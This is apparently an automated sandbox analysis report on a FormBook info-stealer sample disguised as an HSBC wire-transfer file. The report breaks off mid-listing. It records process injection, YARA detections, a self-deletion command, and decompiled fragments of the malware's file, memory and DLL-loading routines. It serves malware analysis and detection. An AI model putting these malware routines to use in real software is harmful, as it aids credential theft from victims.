GetMessageA | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xEF

                    System Behavior

                    General

                    Start time:18:56:44
                    Start date:25/11/2021
                    Path:C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
                    Imagebase:0x3e0000
                    File size:471552 bytes
                    MD5 hash:99B154970D15748D1DF9025F675ECC76
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    General

                    Start time:18:56:47
                    Start date:25/11/2021
                    Path:C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe
                    Imagebase:0xc00000
                    File size:471552 bytes
                    MD5 hash:99B154970D15748D1DF9025F675ECC76
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    General

                    Start time:18:56:50
                    Start date:25/11/2021
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\Explorer.EXE
                    Imagebase:0x7ff720ea0000
                    File size:3933184 bytes
                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:high

                    General

                    Start time:18:57:12
                    Start date:25/11/2021
                    Path:C:\Windows\SysWOW64\ipconfig.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\ipconfig.exe
                    Imagebase:0xc50000
                    File size:29184 bytes
                    MD5 hash:B0C7423D02A007461C850CD0DFE09318
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:moderate

                    General

                    Start time:18:57:17
                    Start date:25/11/2021
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:/c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
                    Imagebase:0xd80000
                    File size:232960 bytes
                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:18:57:18
                    Start date:25/11/2021
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7f20f0000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Disassembly

                    Code Analysis

                      Executed Functions

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.289756514.0000000000C60000.00000040.00000001.sdmp, Offset: 00C60000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: 48Zm$48Zm$d
                      • API String ID: 0-1312976157
                      • Opcode ID: 86cdc9e645dff4f3c6fe5a70be5ae0a096fbdf68e7abc50504d33a12fffa6b18
                      • Instruction ID: 9aa3f51aeca531cd1914772fbdc2fbc324bd196758574c274968aa832d4dcc28
                      • Opcode Fuzzy Hash: 86cdc9e645dff4f3c6fe5a70be5ae0a096fbdf68e7abc50504d33a12fffa6b18
                      • Instruction Fuzzy Hash: 8AC23C78B00205CFDB28DF64D498AA977B2FB89305F1184E6D90A9B359DB34ED42CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.289756514.0000000000C60000.00000040.00000001.sdmp, Offset: 00C60000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e6f3915d0d37d16427c6299adbd2b52b26e86028190d1ccf1bdc7dca482389bb
                      • Instruction ID: d803b59b5d9bb57bd09d3fb410244cc4276b637759fdde2ffb26beaacf047bd6
                      • Opcode Fuzzy Hash: e6f3915d0d37d16427c6299adbd2b52b26e86028190d1ccf1bdc7dca482389bb
                      • Instruction Fuzzy Hash: 7A225631A082528FEF34DB75C4D46BD77A2AF80310F194669D826AB2D5CF38CD49D792
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • RtlEncodePointer.NTDLL(00000000), ref: 00C64522
                      Memory Dump Source
                      • Source File: 00000000.00000002.289756514.0000000000C60000.00000040.00000001.sdmp, Offset: 00C60000, based on PE: false
                      Similarity
                      • API ID: EncodePointer
                      • String ID:
                      • API String ID: 2118026453-0
                      • Opcode ID: af316b5973df4e9b771f2f9190c5fb46190b4a40ca2cc7ad3c3a02dbbb6d27a3
                      • Instruction ID: 66da87c2ac29ceb745761936c3ba00c9ff6fb1111072d2b3809b0fd784378962
                      • Opcode Fuzzy Hash: af316b5973df4e9b771f2f9190c5fb46190b4a40ca2cc7ad3c3a02dbbb6d27a3
                      • Instruction Fuzzy Hash: FF2179B59043448FDF60CFA5D58979EBFF4FB89324F14842AC805A3601D7389A41CB92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • RtlEncodePointer.NTDLL(00000000), ref: 00C647CD
                      Memory Dump Source
                      • Source File: 00000000.00000002.289756514.0000000000C60000.00000040.00000001.sdmp, Offset: 00C60000, based on PE: false
                      Similarity
                      • API ID: EncodePointer
                      • String ID:
                      • API String ID: 2118026453-0
                      • Opcode ID: 7eac66c46b375a52b928ddbbe11916e7805a996e9321ac0533892ba35efa274f
                      • Instruction ID: 80824f8c281456d79e32cc89c5fb92f4de45932cc77c77ead3ca865a64729b68
                      • Opcode Fuzzy Hash: 7eac66c46b375a52b928ddbbe11916e7805a996e9321ac0533892ba35efa274f
                      • Instruction Fuzzy Hash: 9F21CDB4C003488FDB20DFA5D5847DEBBF4EB49328F24442ED515E3641C7389945CBA2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • RtlEncodePointer.NTDLL(00000000), ref: 00C64522
                      Memory Dump Source
                      • Source File: 00000000.00000002.289756514.0000000000C60000.00000040.00000001.sdmp, Offset: 00C60000, based on PE: false
                      Similarity
                      • API ID: EncodePointer
                      • String ID:
                      • API String ID: 2118026453-0
                      • Opcode ID: 4ee13576ea16f0f34b454cf8c872275f92f8b9e0e70a5554f88d0245c8226652
                      • Instruction ID: 0782a66ea4f7cdb8dc6232f035b129e1c9e9411d42653e26f1170f7aaa36d0d6
                      • Opcode Fuzzy Hash: 4ee13576ea16f0f34b454cf8c872275f92f8b9e0e70a5554f88d0245c8226652
                      • Instruction Fuzzy Hash: AB117CB4A003498FDF60CFAAD5497DEBBF4FB89329F108429D805A3601D779A944CFA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      Executed Functions

                      C-Code - Quality: 37%
                      			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                      				void* _t18;
                      				void* _t27;
                      				intOrPtr* _t28;
                      
                      				_t13 = _a4;
                      				_t28 = _a4 + 0xc48;
                      				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                      				_t4 =  &_a40; // 0x414a31
                      				_t6 =  &_a32; // 0x414d72
                      				_t12 =  &_a8; // 0x414d72
                      				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                      				return _t18;
                      			}






                      APIs
                      • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: FileRead
                      • String ID: 1JA$rMA$rMA
                      • API String ID: 2738559852-782607585
                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                      • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                      • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: ad7a2b69c23d8c87a9f3000123ea59aa2bef7613659c0c02c8a21a222789760a
                      • Instruction ID: 5f4264bd310aba6d53aa1ebb4fc90f0fdf7fc59ea5c3541b9fb3111a50711025
                      • Opcode Fuzzy Hash: ad7a2b69c23d8c87a9f3000123ea59aa2bef7613659c0c02c8a21a222789760a
                      • Instruction Fuzzy Hash: 8411D4B2204108AFDB08CF99EC81EEB77ADEF8C754B158649FA1DD3240C630EC518BA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0040ACF0(void* __ebx, void* __edi, void* __eflags, void* _a4, intOrPtr _a8) {
                      				char* _v8;
                      				struct _EXCEPTION_RECORD _v12;
                      				struct _OBJDIR_INFORMATION _v16;
                      				char _v536;
                      				void* _t15;
                      				struct _OBJDIR_INFORMATION _t17;
                      				struct _OBJDIR_INFORMATION _t18;
                      				void* _t32;
                      				void* _t33;
                      				void* _t34;
                      
                      				_v8 =  &_v536;
                      				_t15 = E0041CC50( &_v12, 0x104, _a8);
                      				_t33 = _t32 + 0xc;
                      				if(_t15 != 0) {
                      					_t17 = E0041D070(__eflags, _v8);
                      					_t34 = _t33 + 4;
                      					__eflags = _t17;
                      					if(_t17 != 0) {
                      						E0041D2F0(__ebx, __edi,  &_v12, 0);
                      						_t34 = _t34 + 8;
                      					}
                      					_t18 = E0041B4A0(_v8);
                      					_v16 = _t18;
                      					__eflags = _t18;
                      					if(_t18 == 0) {
                      						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                      						return _v16;
                      					}
                      					return _t18;
                      				} else {
                      					return _t15;
                      				}
                      			}













                      APIs
                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Load
                      • String ID:
                      • API String ID: 2234796835-0
                      • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                      • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                      • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                      • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 79%
                      			E0041A35A(void* __ecx, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
                      				intOrPtr _v0;
                      				long _t21;
                      				void* _t34;
                      
                      				asm("sbb dl, [ebp-0x75]");
                      				_t15 = _v0;
                      				_t3 = _t15 + 0xc40; // 0xc40
                      				E0041AF60(_t34, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
                      				_t21 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
                      				return _t21;
                      			}






                      APIs
                      • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: 1cd9c65bb27f183f89a46229e2e1a735b4de4fd3e7bb8d00e906766b24bafcb3
                      • Instruction ID: 8b67ffc8b34fb7d680d2891edcba8a278bfb604c463cdfcb4a44eb0438df59d2
                      • Opcode Fuzzy Hash: 1cd9c65bb27f183f89a46229e2e1a735b4de4fd3e7bb8d00e906766b24bafcb3
                      • Instruction Fuzzy Hash: 5B01F2B2201108BFCB08CF98DC81EEB37A9AF8C754F158248FA1DE3241C630E811CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0041A360(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                      				long _t21;
                      				void* _t31;
                      
                      				_t3 = _a4 + 0xc40; // 0xc40
                      				E0041AF60(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                      				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                      				return _t21;
                      			}





                      APIs
                      • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                      • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                      • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0041A540(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                      				long _t14;
                      				void* _t21;
                      
                      				_t3 = _a4 + 0xc60; // 0xca0
                      				E0041AF60(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                      				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                      				return _t14;
                      			}





                      APIs
                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: AllocateMemoryVirtual
                      • String ID:
                      • API String ID: 2167126740-0
                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                      • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                      • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0041A490(intOrPtr _a4, void* _a8) {
                      				long _t8;
                      				void* _t11;
                      
                      				_t5 = _a4;
                      				_t2 = _t5 + 0x10; // 0x300
                      				_t3 = _t5 + 0xc50; // 0x40a943
                      				E0041AF60(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                      				_t8 = NtClose(_a8); // executed
                      				return _t8;
                      			}





                      APIs
                      • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Close
                      • String ID:
                      • API String ID: 3535843008-0
                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                      • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                      • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 4695e64c2c40e64619faac65e399cb0999a84b4dbd0868e7d5dbe03ab1075378
                      • Instruction ID: 5e08d7068ea4aa736484ed1a64031c44616ca963b12c76e80819ac585f736545
                      • Opcode Fuzzy Hash: 4695e64c2c40e64619faac65e399cb0999a84b4dbd0868e7d5dbe03ab1075378
                      • Instruction Fuzzy Hash: FA9002B120100402E140759948057470109ABD0341F51C411A5055554EC6998DD576A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: true
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 7260c4e954a2a5acae82a67e0e12353f0d1008f1db04e5cfbcbe6d81f96ecd09
                      • Instruction ID: 6eacbef5086a18f167f80593dbe9a18137ac7f069bc6d9a28ff37751df4708f2
                      • Opcode Fuzzy Hash: 7260c4e954a2a5acae82a67e0e12353f0d1008f1db04e5cfbcbe6d81f96ecd09
                      • Instruction Fuzzy Hash: DA9002A134100442E10065994815B070109EBE1341F51C415E1055554DC659CC527166
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0041A630(intOrPtr _a4, char _a8, long _a12, long _a16) {
                      				void* _t10;
                      				void* _t15;
                      
                      				E0041AF60(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                      				_t6 =  &_a8; // 0x414536
                      				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                      				return _t10;
                      			}






                      APIs
                      • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID: 6EA
                      • API String ID: 1279760036-1400015478
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 65%
                      			E00408393(void* __eflags, intOrPtr _a8, long _a12, char* _a16, int _a20, intOrPtr _a57327693) {
                      				char* _v4;
                      				char* _v8;
                      				char _v64;
                      				char* _v132;
                      				char* _v136;
                      				char _v656;
                      				char* _v668;
                      				char _v680;
                      				char* _v684;
                      				char _v688;
                      				char* __ebx;
                      				intOrPtr __edi;
                      				int __esi;
                      				void* _t64;
                      				int _t65;
                      				void* _t68;
                      				void* _t69;
                      				void* _t72;
                      				long _t73;
                      				int _t77;
                      				void* _t79;
                      
                      				_t85 = __eflags;
                      				asm("aad 0xc8");
                      				if(__eflags != 0) {
                      					_a57327693 = _a57327693 + _t69;
                      					_push(_t69);
                      					E0041CA00();
                      					_t64 = E0040ACF0(_t68, _t72, _t85, _a8 + 0x1c,  &_v64); // executed
                      					_t65 = E00414E50(_a8 + 0x1c, _t64, 0, 0, 0xc4e7b6d6);
                      					_t77 = _t65;
                      					if(_t77 != 0) {
                      						_push(_t72);
                      						_t73 = _a12;
                      						_t65 = PostThreadMessageW(_t73, 0x111, 0, 0); // executed
                      						_t87 = _t65;
                      						if(_t65 == 0) {
                      							_t65 =  *_t77(_t73, 0x8003, _t79 + (E0040A480(_t87, 1, 8) & 0x000000ff) - 0x40, _t65);
                      						}
                      					}
                      					return _t65;
                      				} else {
                      					asm("int 0x9a");
                      					_pop(ss);
                      					asm("cmpsd");
                      					__ebp = __ebp << 1;
                      					asm("adc eax, 0x8b5592bf");
                      					_push(__ebp);
                      					__ebp = __esp;
                      					__esp = __esp - 0x2ac;
                      					_push(__ebx);
                      					_push(__esi);
                      					_push(__edi);
                      					__eax = 0;
                      					_v4 = 0;
                      					_v684 = 0;
                      					 &_v680 = E0041BE60( &_v680, 0, 0x2a4);
                      					__esi = _a20;
                      					__ecx =  *((intOrPtr*)(__esi + 0x300));
                      					__edi = _a8;
                      					_push(__ecx);
                      					_push(__edi); // executed
                      					__eax = E00408310(__ebx, __ecx, __edi, __eflags); // executed
                      					__esp = __esp + 0x14;
                      					__eax = E0041B750(__ecx);
                      					_t16 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
                      					__ebx = __eax + _t16;
                      					_a20 = 0;
                      					while(1) {
                      						__eax = E0040F670(__edi, 0xfe363c80); // executed
                      						__ecx =  *((intOrPtr*)(__esi + 0x2f4));
                      						__eax =  &_v688;
                      						__eax = E0041A500(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v688, 0x2a8, 0); // executed
                      						 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
                      						__eflags = __eax;
                      						if(__eax < 0) {
                      							break;
                      						}
                      						__eflags = _v656;
                      						if(_v656 == 0) {
                      							L13:
                      							__eax = _a16;
                      							__eax = _a16 + 1;
                      							_a16 = __eax;
                      							__eflags = __eax - 2;
                      							if(__eax < 2) {
                      								continue;
                      							} else {
                      								__ebx = _v8;
                      								goto L17;
                      							}
                      						} else {
                      							__eflags = _v668;
                      							if(_v668 == 0) {
                      								goto L13;
                      							} else {
                      								__eflags = _v136;
                      								if(_v136 == 0) {
                      									goto L13;
                      								} else {
                      									__eflags = _v132;
                      									if(_v132 != 0) {
                      										__eax = _a12;
                      										__edx =  &_v688;
                      										__ebx = 1;
                      										__eax = E0041BDE0(_a12,  &_v688, 0x2a8);
                      										L17:
                      										__ecx =  *((intOrPtr*)(__esi + 0x2f4));
                      										__eax = E0041A490(__edi,  *((intOrPtr*)(__esi + 0x2f4))); // executed
                      										__eflags = __ebx;
                      										if(__ebx == 0) {
                      											break;
                      										} else {
                      											__edx = _v668;
                      											__eax = _a12;
                      											__ecx = _v136;
